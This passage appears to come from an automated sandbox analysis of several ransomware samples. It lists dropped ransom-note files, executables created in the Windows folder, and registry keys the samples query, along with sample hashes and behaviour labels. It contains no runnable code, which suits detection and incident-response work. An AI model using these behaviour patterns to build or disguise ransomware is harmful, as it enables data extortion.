C:\Program Files\Microsoft Games\Hearts\it-IT\_ReCoVeRy_+lpoqi.png qbqsfahnmfxr.exe File opened for modification \??\c:\program files (x86)\microsoft\microsoft sql server UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\Triedit\es-ES\Recovery+kuuko.txt hbuuvsjbfrbv.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\.data\Recovery+kuuko.txt hbuuvsjbfrbv.exe File opened for modification C:\Program Files\Microsoft Games\Chess\en-US\Recovery+armja.txt lpdcqkacfhfo.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\_ReCoVeRy_+lpoqi.png qbqsfahnmfxr.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\blackbars60.png mfxriq.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Recovery+qiweg.txt bqsfahnmfxri.exe File opened for modification C:\Program Files\Microsoft Games\FreeCell\en-US\_ReCoVeRy_+lpoqi.png qbqsfahnmfxr.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hy\Recovery+kuuko.png hbuuvsjbfrbv.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\de-DE\css\slideShow.css qbqsfahnmfxr.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\_ReCoVeRy_+lpoqi.html qbqsfahnmfxr.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_uparrow.png mfxriq.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\VisualElements\Recovery+kuuko.png hbuuvsjbfrbv.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sw\_ReCoVeRy_+lpoqi.html qbqsfahnmfxr.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\packetizer\Recovery+qiweg.html bqsfahnmfxri.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Pine_Lumber.jpg mfxriq.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\Recovery+kuuko.html hbuuvsjbfrbv.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_right_hover.png hbuuvsjbfrbv.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\lv\Recovery+qiweg.txt bqsfahnmfxri.exe File opened for modification C:\Program Files\7-Zip\Lang\uz.txt hbuuvsjbfrbv.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\_ReCoVeRy_+lpoqi.png qbqsfahnmfxr.exe File opened for modification C:\Program Files\Microsoft Games\Purble Place\fr-FR\Recovery+qiweg.html bqsfahnmfxri.exe File opened for modification C:\Program Files\Windows Media Player\ja-JP\_ReCoVeRy_+pqnjv.png mfxriq.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\MSInfo\de-DE\Recovery+armja.png lpdcqkacfhfo.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\lo\Recovery+armja.txt lpdcqkacfhfo.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\tt\Recovery+qiweg.txt bqsfahnmfxri.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\fr-FR\css\picturePuzzle.css qbqsfahnmfxr.exe File opened for modification C:\Program Files\Reference Assemblies\Recovery+kuuko.txt hbuuvsjbfrbv.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\Recovery+armja.txt lpdcqkacfhfo.exe -
Drops file in Windows directory 64 IoCs
description ioc Process File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\microsoft sql server UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\outlook UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\thunderbird UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\word UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\excel UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\powerpoint UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification C:\Windows\hbuuvsjbfrbv.exe Trojan-Ransom.Win32.Bitman.kat-8f9525c36232f06c1988cf6c61e59fe4861960425b44e070e2433878a53254da.exe File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\onenote UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\onenote UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\word UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\steam UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\thunderbird UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\ UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft sql server UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\microsoft sql server UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\office UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\outlook UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\the bat! UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification C:\Windows\isrnabuf.exe explorer.exe File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\excel UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification C:\Windows\lpdcqkacfhfo.exe Trojan-Ransom.Win32.Bitman.nws-33a239665b9392e9078ff754f9534efa7d1037cea9fea0ee6e8955dc94788d4d.exe File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\bitcoin UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\microsoft sql server UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\onenote UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\serviceprofiles\localservice\desktop UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File created C:\Windows\bqsfahnmfxri.exe Trojan-Ransom.Win32.Bitman.jki-ba5b9db47164c3562a877b339bd56900d1a7f4bbb3db388d100e864c58aef7ca.exe File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft sql server UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\powerpoint UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\steam UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\the bat! UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\the bat! UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File created C:\Windows\lpdcqkacfhfo.exe Trojan-Ransom.Win32.Bitman.nws-33a239665b9392e9078ff754f9534efa7d1037cea9fea0ee6e8955dc94788d4d.exe File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft sql server UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft sql server UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\powerpoint UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\powerpoint UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\word UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\serviceprofiles\localservice\documents UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\excel UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\excel UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\office UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\onenote UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\outlook UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\powerpoint UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File created C:\Windows\hbuuvsjbfrbv.exe Trojan-Ransom.Win32.Bitman.kat-8f9525c36232f06c1988cf6c61e59fe4861960425b44e070e2433878a53254da.exe File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\excel UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\powerpoint UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\powerpoint UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\the bat! UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\bitcoin UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification C:\Windows\bqsfahnmfxri.exe Trojan-Ransom.Win32.Bitman.jki-ba5b9db47164c3562a877b339bd56900d1a7f4bbb3db388d100e864c58aef7ca.exe File opened for modification C:\Windows\vmsmqjynx.exe Trojan-Ransom.Win32.Bitman.ixe-30c5bc4abf763783134324da789e8333f41c49198f57a91374e31b4e72a459ff.exe File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\onenote UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\outlook UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\word UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification C:\Windows\ UDS-Trojan-Ransom.NSIS.Onion.gen-07ef46f6603ec83821687140eb911260585d39c1bd59e62fa3f62f7b12ddbdaa.exe File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\powerpoint UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\word UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\onenote UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\steam UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\bitcoin UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\microsoft sql server UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\office UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\outlook UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe -
Program crash 3 IoCs
pid pid_target Process procid_target 51672 1616 WerFault.exe 40460 1608 WerFault.exe 59 38072 22872 WerFault.exe 79 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Zerber.tbl-943a3719421e25e4d6fe728f0037ef6aa601e3947aaf2c8733faf8fddcbad1e0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Agent.gen-ab452e241bbd146a9749d05a740af35750945dfa7c0ab5c4108bc0d821a3f687.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language REG.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.MSIL.Agent.yh-bab7af3306f66d5deaafda1f0cd57c20e42678451a7bc70c71255f6a7e1806be.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language lpdcqkacfhfo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iexplore.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Bitman.jki-ba5b9db47164c3562a877b339bd56900d1a7f4bbb3db388d100e864c58aef7ca.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UDS-Trojan-Ransom.NSIS.Onion.gen-07ef46f6603ec83821687140eb911260585d39c1bd59e62fa3f62f7b12ddbdaa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rj3fNWF3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Zerber.dwth-4a8a428ddc4db3aef5e7cb1893782787a0bef5dff708f2ef670ac29e1d83eb82.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Bitman.jki-ba5b9db47164c3562a877b339bd56900d1a7f4bbb3db388d100e864c58aef7ca.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qbqsfahnmfxr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Agent.iyl-f112d0794226336fb6fb82ed44de53c9d7978e05341e632f5eeefffad7d3eeef.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Zerber.dpqs-bc856cfae44077f57b48b11285e922b4130a6479dfed1f43f89f2fc5b2ede094.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.SageCrypt.ddo-47b85d5a354baab3ba50aee57ff426c6c465a621950fd60d3f20be881ba68853.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ebicabfbdfbcg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CTHelpers.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Bitman.ixe-30c5bc4abf763783134324da789e8333f41c49198f57a91374e31b4e72a459ff.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bqsfahnmfxri.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language geaw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sxain.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Locky.wsq-eefb58808bf8684d2febaf71fc9430d229dcda6a1cd6e6b95f0b9f935649aac2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UDS-Trojan-Ransom.Win32.CryptXXX.sb-3d0af672ee06451fe1a7c9a27c8f36f4ec492ea1196210425d24199456626022.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Bitman.gen-6ffbd3719fbff5e33fba8737b5435c66cdb7aa66a34302e125fa8bb888604670.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rj3fNWF3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Bitman.nws-33a239665b9392e9078ff754f9534efa7d1037cea9fea0ee6e8955dc94788d4d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Bitman.ahx-0e9b8711d12f06224bf0b426e09d80f5ce27908b90b1912140cc316c0683ff01.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe -
NSIS installer 14 IoCs
